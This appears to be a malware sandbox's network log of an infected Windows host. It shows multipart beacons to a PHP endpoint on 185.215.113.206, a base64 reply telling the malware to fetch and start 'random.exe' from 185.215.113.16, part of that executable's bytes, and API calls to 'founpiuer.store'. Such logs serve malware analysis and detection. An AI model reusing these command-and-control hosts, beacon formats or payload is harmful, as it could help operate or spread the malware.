Nov 5, 2024 10:14:06.656955004 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:14:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:14:06.725378990 CET	474	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 2d 2d 0d 0a Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="message"ybncbhylepme------DHIJDHIDBGHJKECBFIID--
Nov 5, 2024 10:14:07.643161058 CET	272	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:14:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:14:07.652765989 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 5, 2024 10:14:08.550374985 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 09:14:08 GMT Content-Type: application/octet-stream Content-Length: 3245056 Last-Modified: Tue, 05 Nov 2024 08:48:24 GMT Connection: keep-alive ETag: "6729dbd8-318400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 90 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@1Hc2@Wk,x1w1 @.rsrc@.idata @paflvhti**@ykjvsrqi1^1@.taggant01"b1@
Nov 5, 2024 10:14:08.550471067 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 10:14:08.550481081 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 10:14:08.550491095 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 10:14:08.550508022 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 10:14:08.550518036 CET	436	IN	Data Raw: f9 d3 47 42 0f 50 46 6a 48 50 8b be f7 89 1b c2 7f 93 02 6a e8 43 2e 20 a3 0f 68 d8 a0 17 e0 7a f6 d3 47 42 2f 50 46 6a 48 50 8b be f7 89 4b c2 3f 93 02 6a e8 7b 2e 20 a3 0f 88 d9 a0 17 e0 da f6 d3 47 42 4f 50 46 6a 48 50 8b be f7 89 4b c2 0f 93 Data Ascii: GBPFjHPjC. hzGB/PFjHPK?j{. GBOPFjHPKj GBoPFjHPj( GBPFjHP3j GBQFjHPOj# ZGBQFjHPOj (:GBQFjHPCo
Nov 5, 2024 10:14:08.550529957 CET	1236	IN	Data Raw: e8 a3 28 20 a3 0f 08 de a0 17 e0 5a f3 d3 47 42 cf 56 46 6a 48 50 8b be f7 89 43 c2 57 92 02 6a e8 5b 17 20 a3 0f 28 de a0 17 e0 3a f3 d3 47 42 ef 56 46 6a 48 50 8b be f7 89 43 c2 2f 92 02 6a e8 33 28 20 a3 0f 48 de a0 17 e0 9a f3 d3 47 42 0f 56 Data Ascii: ( ZGBVFjHPCWj[ (:GBVFjHPC/j3( HGBVFjHPC'j hzGB/VFjHPC?j GBOVFjHPC7j GBoVFjHPCj3 GBVFjHPCjs- GBWF
Nov 5, 2024 10:14:08.550539017 CET	212	IN	Data Raw: 48 50 8b be f7 89 33 c2 6f 6c 02 6a e8 2b 28 20 a3 0f e8 c3 a0 17 e0 fa c5 d3 47 42 af 5b 46 6a 48 50 8b be f7 89 4f c2 77 6c 02 6a e8 77 11 20 a3 0f 08 c3 a0 17 e0 5a c2 d3 47 42 cf 5b 46 6a 48 50 8b be f7 89 33 c2 4b 6c 02 6a e8 4b 13 20 a3 0f Data Ascii: HP3olj+( GB[FjHPOwljw ZGB[FjHP3KljK (:GB[FjHP7Slj- HGB[FjHPC?lj* hzGB/[FjHP?7lj( GBO[FjHP7ljC+
Nov 5, 2024 10:14:08.550621033 CET	1236	IN	Data Raw: a0 17 e0 ba c3 d3 47 42 6f 5b 46 6a 48 50 8b be f7 89 4f c2 e7 6c 02 6a e8 3b 29 20 a3 0f c8 c0 a0 17 e0 1a c0 d3 47 42 8f 5b 46 6a 48 50 8b be f7 89 4f c2 fb 6c 02 6a e8 83 17 20 a3 0f e8 c0 a0 17 e0 fa c0 d3 47 42 af 58 46 6a 48 50 8b be f7 89 Data Ascii: GBo[FjHPOlj;) GB[FjHPOlj GBXFjHPOlj ZGBXFjHP7lj( (:GBXFjHP7lj HGBXFjHPCoj hzGB/XFjHPCoj GBOXFjHP
Nov 5, 2024 10:14:08.550632954 CET	1236	IN	Data Raw: b3 6b 02 6a e8 73 14 20 a3 0f 88 c5 a0 17 e0 da d2 d3 47 42 4f 5c 46 6a 48 50 8b be f7 89 4b c2 6f 6b 02 6a e8 0b 2a 20 a3 0f a8 c5 a0 17 e0 ba d2 d3 47 42 6f 5c 46 6a 48 50 8b be f7 89 4b c2 7f 6b 02 6a e8 c3 16 20 a3 0f c8 c5 a0 17 e0 1a d3 d3 Data Ascii: kjs GBO\FjHPKokj* GBo\FjHPKkj GB\FjHPOOkj+ GB]FjHP3Ckjs ZGB]FjHP+kjs* (:GB]FjHPCkj+. HGB]FjHP?kj hzG
Nov 5, 2024 10:14:08.555671930 CET	1236	IN	Data Raw: ff ef cc a0 45 ba 85 66 a3 e4 f0 aa 36 56 e1 7b cd d6 43 a3 60 13 08 e5 7c 17 81 65 2f ed 02 6a fe 2b 8b be f7 2b 8b be f7 a6 6f 44 31 16 58 cd fe 2b 8b be f7 2b 8b be f7 a2 cc 5e 4a 14 d2 62 36 06 f1 42 b8 66 46 6a 3e 53 4f ff fd b5 fa a4 bf 17 Data Ascii: Ef6V{C`\|e/j++oD1X++^Jb6BfFj>SO+^Jhb0]qceof0XE+++^Vr8GXjvG!jX\|!Xjo0X+++^?KtoXj4S51g+^JhVzJW

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:14:10.679080009 CET	474	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFH Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 63 64 62 30 38 64 37 32 36 30 66 37 30 32 34 65 65 35 63 33 38 36 62 39 39 61 30 30 64 65 61 65 61 35 37 32 34 65 31 37 66 34 61 33 35 39 30 38 39 33 30 66 32 32 62 61 33 62 64 34 62 39 61 38 30 31 37 62 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"6cdb08d7260f7024ee5c386b99a00deaea5724e17f4a35908930f22ba3bd4b9a8017bc30------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FIJKEHJJDAAKFHIDAKFH--
Nov 5, 2024 10:14:12.074842930 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:14:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 10:14:16.031433105 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 10:14:16.932171106 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:14:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 10:14:16.934820890 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 46 41 46 41 35 33 42 33 35 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="hwid"1FAFA53B35381806970752------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="build"tale------EHCAEGDHJKFHJKFIJKJE--
Nov 5, 2024 10:14:17.213205099 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:14:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Timestamp	Bytes transferred	Direction	Data
2024-11-05 09:12:59 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: founpiuer.store
2024-11-05 09:12:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-05 09:12:59 UTC	556	IN	HTTP/1.1 403 Forbidden Date: Tue, 05 Nov 2024 09:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMKbTHc4gm%2FQaKmRbVEIohg37pqh65nqJ5g92s2VRkPdxf3Ijaum7l%2B5kJCr2OaZidKBK%2FUdJUlClNcD2G%2BhbD7GRBliS1FKpVERPzzUDVA8V5vspvJU0xpB37Uq2pdEsxw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddbb9aa7c174869-DFW
2024-11-05 09:12:59 UTC	813	IN	Data Raw: 31 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1154<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-11-05 09:12:59 UTC	1369	IN	Data Raw: 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 Data Ascii: yles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById(
2024-11-05 09:12:59 UTC	1369	IN	Data Raw: 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: nagement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <
2024-11-05 09:12:59 UTC	893	IN	Data Raw: 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 Data Ascii: an> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" i
2024-11-05 09:12:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-05 09:13:00 UTC	352	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=Ad1twZF74K.8uci5JLNCs3ar1E4QIMh2qJpcEcd8nfE-1730797979-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: founpiuer.store
2024-11-05 09:13:00 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-11-05 09:13:00 UTC	1010	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0saprupj05ad6ccto8016mbaj7; expires=Sat, 01-Mar-2025 02:59:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ffyUolNT80uiMJL2QVXVpdVRbYEpHNJgJft4oKNrioVJti7rp58mzrs8KZG78O7ciddK3Z%2B8abm%2FTgUwbZQBPleqXd%2BaX0pZbwXElzceZy2BMGJ4gPjxIBWqr7YhQydABCY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddbb9afc8a0b787-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1294&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1040&delivery_rate=2184012&cwnd=106&unsent_bytes=0&cid=35719992973c7618&ts=737&x=0"
2024-11-05 09:13:00 UTC	359	IN	Data Raw: 63 63 39 0d 0a 70 70 52 71 36 2b 61 6a 6a 6c 6e 79 34 30 44 52 42 44 30 72 38 6f 74 49 41 50 39 6d 51 6b 66 39 68 6c 2b 72 2f 72 51 73 32 48 66 64 74 68 7a 4a 33 4a 65 69 65 34 47 47 59 75 74 77 54 31 36 58 70 32 70 68 6d 30 52 34 49 5a 7a 71 4c 4d 37 53 6c 6c 71 31 56 5a 7a 79 43 34 65 56 78 71 4a 37 6c 35 74 69 36 31 39 47 43 5a 66 6c 61 6a 72 64 41 79 67 6c 6e 4f 6f 39 79 70 58 62 58 4c 51 55 7a 76 67 4e 67 34 50 41 36 6a 69 65 6a 69 57 30 59 56 78 42 6e 4f 49 6c 61 4a 4a 45 62 6d 57 59 2f 48 32 52 33 50 6c 4a 72 42 62 72 39 52 6d 41 78 4e 36 69 49 74 43 47 4c 76 4d 2b 48 30 71 58 36 53 52 6d 6d 77 30 71 4c 35 58 69 50 4d 2b 55 78 45 57 2b 48 38 37 32 44 6f 4b 4a 79 66 34 31 6c 49 6b 75 73 6d 74 63 43 64 36 70 4c 58 72 64 58 47 42 32 72 65 63 73 32 49 Data Ascii: cc9ppRq6+ajjlny40DRBD0r8otIAP9mQkf9hl+r/rQs2HfdthzJ3Jeie4GGYutwT16Xp2phm0R4IZzqLM7Sllq1VZzyC4eVxqJ7l5ti619GCZflajrdAyglnOo9ypXbXLQUzvgNg4PA6jiejiW0YVxBnOIlaJJEbmWY/H2R3PlJrBbr9RmAxN6iItCGLvM+H0qX6SRmmw0qL5XiPM+UxEW+H872DoKJyf41lIkusmtcCd6pLXrdXGB2recs2I
2024-11-05 09:13:00 UTC	1369	IN	Data Raw: 6f 70 74 6e 52 55 51 4a 33 6b 4b 6d 2b 58 43 79 4d 6c 6d 4f 34 33 78 70 62 53 51 37 63 54 78 50 5a 49 78 38 54 47 39 48 76 49 77 51 47 32 64 6c 68 46 68 71 73 51 49 6f 4a 4b 4f 57 57 59 36 48 32 52 33 4e 35 4c 75 52 62 50 2b 51 75 42 6a 39 50 73 4b 5a 61 4d 4a 36 46 67 57 6b 65 61 36 6a 68 6f 6b 77 49 6a 4c 4a 54 74 4f 4d 36 59 6c 67 44 36 45 74 79 32 55 4d 6d 6c 7a 4f 63 33 6d 70 59 69 38 33 6b 52 55 4e 44 75 4a 69 4c 46 52 43 51 6b 6d 2b 55 35 78 35 4c 53 51 72 77 62 79 66 6b 4f 67 34 54 47 35 6a 4f 59 67 43 2b 34 61 56 39 4d 6e 65 30 73 62 70 77 42 59 47 76 66 34 79 57 4a 78 4a 5a 67 76 52 62 57 74 44 32 4b 69 73 2f 72 4c 64 43 65 62 4b 6f 6d 57 45 58 51 73 57 70 73 6d 41 73 79 4a 49 33 68 4d 39 75 51 30 30 69 33 46 73 72 32 44 59 36 4a 7a 2b 6f 38 6b Data Ascii: optnRUQJ3kKm+XCyMlmO43xpbSQ7cTxPZIx8TG9HvIwQG2dlhFhqsQIoJKOWWY6H2R3N5LuRbP+QuBj9PsKZaMJ6FgWkea6jhokwIjLJTtOM6YlgD6Ety2UMmlzOc3mpYi83kRUNDuJiLFRCQkm+U5x5LSQrwbyfkOg4TG5jOYgC+4aV9Mne0sbpwBYGvf4yWJxJZgvRbWtD2Kis/rLdCebKomWEXQsWpsmAsyJI3hM9uQ00i3Fsr2DY6Jz+o8k
2024-11-05 09:13:00 UTC	1369	IN	Data Raw: 6d 57 45 58 51 73 57 70 75 6c 41 51 72 4c 35 76 6b 4f 73 53 5a 31 55 6d 35 47 4d 50 38 42 6f 36 41 7a 65 55 32 6c 6f 45 6c 74 32 4e 4e 54 4a 6e 6c 4a 69 4c 54 52 43 63 39 33 37 78 39 35 70 76 41 54 5a 55 57 31 66 39 49 6c 73 72 59 72 44 79 63 77 58 72 7a 59 56 70 42 6d 2b 38 69 59 6f 38 42 4c 69 36 65 37 6a 76 49 6b 64 70 49 75 68 54 45 38 41 53 4a 67 38 62 2b 4b 5a 57 48 4d 4c 6b 6d 45 51 6d 58 38 57 6f 36 33 54 49 77 4d 6f 37 79 66 2f 79 66 32 45 43 39 41 34 54 70 52 70 44 45 78 75 42 37 79 4d 45 70 73 32 70 59 51 5a 62 74 49 6d 32 53 44 54 49 6b 6b 2b 6f 76 7a 70 7a 66 51 4c 55 5a 7a 66 73 50 68 49 2f 4c 34 54 2b 58 67 47 4c 39 4a 6c 68 52 30 4c 46 71 56 49 30 4a 4c 41 75 55 36 44 53 4a 67 35 68 58 2b 68 4c 49 74 6c 44 4a 67 4d 33 6b 4d 5a 2b 49 4b 4c Data Ascii: 